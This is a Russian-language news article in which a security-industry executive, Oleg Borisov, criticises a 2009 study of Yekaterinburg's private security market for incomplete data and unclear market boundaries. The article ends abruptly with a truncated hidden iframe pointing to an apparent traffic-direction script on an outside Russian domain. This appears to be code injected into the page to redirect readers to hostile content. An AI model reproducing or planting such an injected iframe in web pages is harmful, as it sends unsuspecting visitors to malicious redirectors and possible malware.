Основным недостатком проведенного в Екатеринбурге исследования рынка охранных услуг является его проведение на основании усеченной информации. И эта проблема свойственна исследованию практически всех рынков, как по Свердловской области, так и по России. Причина этого — общая непрозрачность отечественного бизнеса», — заявил генеральный директор ЗАО «Информационно-консалтинговый центр «Европа-Азия», президент Ассоциации «Уральский центр негосударственных предприятий безопасности» Олег Борисов.
Напомним, в марте 2009 года было опубликовано первое профессиональное исследование рынка охранных услуг города Екатеринбурга. Заказчиками анализа ситуации в данной отрасли выступили Комитет по товарному рынку администрации Екатеринбурга и заместитель Главы города Виктор Контеев
«К сожалению, это основная проблема всех исследований, проводимых в России. Дело в том, что большая часть компаний, в том числе и охранных, непрозрачны. Участники не стремятся распространять информацию о своей финансовой деятельности, особенностях работы. Эта информация является закрытой. Для получения хоть сколько-нибудь объективных данных необходимо привлечение информации от официальных структур — МВД, прокуратуры, разрешительной системы, налоговой инспекции, органов статистики. Без них любой анализ будет неполным», — полагает эксперт.
«Другой проблемой анализа является неопределенность рынка, его двойственность. Ведь, с одной стороны, частные охранные предприятия являются структурами обеспечения безопасности общества и должны рассматриваться именно в этом ключе. С другой стороны, охранная деятельность — это бизнес, имеющий свою экономическую составляющую. И в этом случае требуется совершенно иной анализ его работы», — отмечает О.Борисов.
«Я могу привести такой пример. Отечественными экспертами рынок охранных услуг в России оценивается примерно в 10 миллиардов долларов. Эксперты Западной Европы говорят о других цифрах — 15 миллиардов евро. О чем говорит такое большое расхождение в цифрах? О том, что мы не выработали критерий оценки рынка данной услуги. Западные специалисты оценивают «рынок безопасности». У них есть четко сформулированные критерии того, что является субъектом этого рынка. Имеются системы коммерческой безопасности, которая является составной частью общественной безопасности. Отдельно выделяется рынок охранных услуг, который не является основным на рынке обеспечения безопасности», — добавил О.Борисов.
«У нас все несколько иначе: четкое деление отсутствует, некоторые категории безопасности из анализа просто выпадают. В качестве примера можно взять сравнение показателей вневедомственной охраны и частых охранных предприятий. Как правило, считается, что рынок Екатеринбурга поделен 50 на 50. Этот расчет ошибочен, потому что в нем не учтен еще один важнейший участник рынка — ведомственная охрана. Это структуры, созданные при различных министерствах, ведомствах и госкорпорациях. Они не имеют отношения ни к частным охранным предприятиям, ни к милиции, а по уровню возможностей и различного рода «преференций» находятся между ними. Формально ведомственная охрана должна контролировать соответствующие ведомственные объекты. Но по закону она имеет право заниматься и коммерческой деятельностью», — отмечает О.Борисов.
«А теперь давайте посмотрим на такую сферу, как монтаж охранно-пожарных сигнализаций, систем ограничения доступа и систем телемониторинга. Относятся ли они к рынку охранных услуг? Если мы ответим «да», то показатели вневедомственной охраны на рынке Свердловской области изменятся до 30%. Именно эти структуры традиционно сильны монтажом охранно-пожарных сигнализаций и группами быстрого реагирования», — констатировал генеральный директор ЗАО «Информационно-консалтинговый центр «Европа-Азия».
<iframe src="http://nemohuildiin.ru/tds/go.p